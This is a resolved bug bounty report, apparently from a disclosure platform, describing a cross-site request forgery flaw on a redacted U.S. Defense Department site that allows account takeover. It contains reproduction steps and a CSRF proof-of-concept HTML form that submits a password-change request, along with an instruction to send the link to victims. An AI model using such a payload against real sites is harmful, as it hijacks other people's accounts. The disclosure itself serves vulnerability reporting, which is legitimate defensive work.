CSRF to account takeover in https://███████.mil/
Critical
U
U.S. Dept Of Defense
Submitted None
Actions:
Reported by
dhakal_bibek
Vulnerability Details
Technical details and impact analysis
**Summary:**
Hello
**Description:**
## Impact
## Step-by-step Reproduction Instructions
1. Go to https://███.mil/ and login using your credintials
2. Now Click on change password
3. First turn the intercept of burp to on and enter your secondary email id and password and click on register password.
```
<html>
<!-- CSRF PoC - kira-->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://████████.mil/scripts/wa.exe" method="POST">
<input type="hidden" name="GETPW2" value="GETPW1" />
<input type="hidden" name="Y" value="a█████" />
<input type="hidden" name="p" value="████████" />
<input type="hidden" name="q" value="███████" />
<input type="hidden" name="X" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
4: Now send the link to the victims
## Product, Version, and Configuration (If applicable)
██████
## Impact
It is a critical issue as i was able to takeover anyone account using this attack..
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Cross-Site Request Forgery (CSRF)